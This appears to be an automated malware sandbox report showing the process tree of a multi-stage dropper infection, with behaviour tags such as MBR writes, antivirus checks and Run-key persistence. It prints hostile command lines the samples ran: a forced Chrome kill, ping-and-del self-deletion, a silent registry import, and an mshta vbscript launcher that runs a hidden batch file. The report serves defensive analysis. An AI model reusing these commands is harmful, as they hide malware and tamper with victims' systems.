C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵PID:5780
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:2784 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2888
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"6⤵PID:4312
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:4416
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:2272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:2228
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:3844
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
PID:4176 -
C:\Users\Admin\AppData\Local\Temp\1WVCXOJJ02\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1WVCXOJJ02\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4280 -
C:\Users\Admin\AppData\Local\Temp\1WVCXOJJ02\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1WVCXOJJ02\multitimer.exe" 1 3.1615299780.604784c41cab1 1016⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4972 -
C:\Users\Admin\AppData\Local\Temp\1WVCXOJJ02\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1WVCXOJJ02\multitimer.exe" 2 3.1615299780.604784c41cab17⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1576 -
C:\Users\Admin\AppData\Local\Temp\yd1bklupduo\bf5zejfu4ks.exe"C:\Users\Admin\AppData\Local\Temp\yd1bklupduo\bf5zejfu4ks.exe" testparams8⤵
- Executes dropped EXE
PID:4424 -
C:\Users\Admin\AppData\Roaming\fqdzfuoap2u\zm2envmeni4.exe"C:\Users\Admin\AppData\Roaming\fqdzfuoap2u\zm2envmeni4.exe" /VERYSILENT /p=testparams9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4148 -
C:\Users\Admin\AppData\Local\Temp\is-32R2K.tmp\zm2envmeni4.tmp"C:\Users\Admin\AppData\Local\Temp\is-32R2K.tmp\zm2envmeni4.tmp" /SL5="$601DE,552809,216064,C:\Users\Admin\AppData\Roaming\fqdzfuoap2u\zm2envmeni4.exe" /VERYSILENT /p=testparams10⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4308
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5ynbve4kcrb\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\5ynbve4kcrb\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4468 -
C:\Users\Admin\AppData\Local\Temp\is-205H1.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-205H1.tmp\Setup3310.tmp" /SL5="$20200,802346,56832,C:\Users\Admin\AppData\Local\Temp\5ynbve4kcrb\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4600 -
C:\Users\Admin\AppData\Local\Temp\is-IMCLG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IMCLG.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4580 -
C:\Users\Admin\AppData\Local\Temp\is-N83GG.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-N83GG.tmp\Setup.tmp" /SL5="$202B2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-IMCLG.tmp\Setup.exe" /Verysilent11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5164 -
C:\Users\Admin\AppData\Local\Temp\is-9VCL9.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-9VCL9.tmp\PictureLAb.exe" /Verysilent12⤵PID:6252
-
C:\Users\Admin\AppData\Local\Temp\is-P76K1.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-P76K1.tmp\PictureLAb.tmp" /SL5="$104CA,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-9VCL9.tmp\PictureLAb.exe" /Verysilent13⤵PID:6356
-
C:\Users\Admin\AppData\Local\Temp\is-S0JSR.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-S0JSR.tmp\Setup.exe" /VERYSILENT14⤵PID:6624
-
C:\Users\Admin\AppData\Local\Temp\is-BJ61B.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BJ61B.tmp\Setup.tmp" /SL5="$302CE,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-S0JSR.tmp\Setup.exe" /VERYSILENT15⤵PID:6668
-
C:\Users\Admin\AppData\Local\Temp\is-1LMUU.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-1LMUU.tmp\def.exe" /S /UID=lab21416⤵PID:7092
-
C:\Program Files\Windows Sidebar\QSAVHKERNK\prolab.exe"C:\Program Files\Windows Sidebar\QSAVHKERNK\prolab.exe" /VERYSILENT17⤵PID:5404
-
C:\Users\Admin\AppData\Local\Temp\is-HIJCH.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-HIJCH.tmp\prolab.tmp" /SL5="$2025E,575243,216576,C:\Program Files\Windows Sidebar\QSAVHKERNK\prolab.exe" /VERYSILENT18⤵PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\17-d018d-9e2-a4387-c3adfc7911acd\Peshipupyly.exe"C:\Users\Admin\AppData\Local\Temp\17-d018d-9e2-a4387-c3adfc7911acd\Peshipupyly.exe"17⤵PID:2924
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1lyyjug.j4v\lod.exe & exit18⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\x1lyyjug.j4v\lod.exeC:\Users\Admin\AppData\Local\Temp\x1lyyjug.j4v\lod.exe19⤵PID:4828
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo HQxchYwhQ20⤵PID:7256
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Riconobbe.xlt20⤵PID:7488
-
C:\Windows\SysWOW64\cmd.execmd21⤵PID:7704
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vavmneeg.gpu\customer4.exe & exit18⤵PID:7300
-
C:\Users\Admin\AppData\Local\Temp\vavmneeg.gpu\customer4.exeC:\Users\Admin\AppData\Local\Temp\vavmneeg.gpu\customer4.exe19⤵PID:7440
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"20⤵PID:7660
-
C:\Windows\regedit.exeregedit /s chrome.reg21⤵
- Runs .reg file with regedit
PID:7548
-
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe21⤵
- Kills process with taskkill
PID:7536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat21⤵PID:8180
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)22⤵PID:4032
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"23⤵PID:4840
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"24⤵PID:7400
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ffc9d706e00,0x7ffc9d706e10,0x7ffc9d706e2025⤵PID:7420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1864 /prefetch:825⤵PID:6380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:125⤵PID:7700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2780 /prefetch:125⤵PID:2188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1852 /prefetch:825⤵PID:6828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1792 /prefetch:225⤵PID:5180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3376 /prefetch:825⤵PID:8112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:125⤵PID:8144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:125⤵PID:4304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:125⤵PID:8176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:125⤵PID:8164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:825⤵PID:7188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4496 /prefetch:825⤵PID:4992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4640 /prefetch:825⤵PID:6996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4824 /prefetch:825⤵PID:6776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4396 /prefetch:825⤵PID:4076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5172 /prefetch:825⤵PID:9168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4256 /prefetch:825⤵PID:4552
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings25⤵PID:3620
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0xd4,0x248,0x7ff686677740,0x7ff686677750,0x7ff68667776026⤵PID:4428
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4260 /prefetch:825⤵PID:4876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4272 /prefetch:825⤵PID:5640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4184 /prefetch:825⤵PID:3604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4144 /prefetch:825⤵PID:5344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3884 /prefetch:825⤵PID:8296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4076 /prefetch:825⤵PID:7620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4616 /prefetch:825⤵PID:7616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1908 /prefetch:825⤵PID:6424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3856 /prefetch:825⤵PID:1048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4300 /prefetch:825⤵PID:7652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1028 /prefetch:825⤵PID:5188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3920 /prefetch:825⤵PID:5380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1776 /prefetch:825⤵PID:4936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:825⤵PID:7164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4936 /prefetch:825⤵PID:8500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4520 /prefetch:825⤵PID:5220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4740 /prefetch:825⤵PID:8580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5312 /prefetch:825⤵PID:8956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4292 /prefetch:825⤵PID:8624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4068 /prefetch:825⤵PID:5244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5532 /prefetch:825⤵PID:8904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5672 /prefetch:825⤵PID:8520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:125⤵PID:8348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5792 /prefetch:825⤵PID:8324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6048 /prefetch:825⤵PID:4784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6208 /prefetch:825⤵PID:5752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6188 /prefetch:825⤵PID:4840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6440 /prefetch:825⤵PID:5320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6324 /prefetch:825⤵PID:9076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6604 /prefetch:825⤵PID:7380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3652 /prefetch:825⤵PID:8496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:125⤵PID:4212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1908 /prefetch:825⤵PID:1624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7096 /prefetch:825⤵PID:7312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7232 /prefetch:825⤵PID:8336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3172 /prefetch:825⤵PID:9032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:125⤵PID:7620
-
-
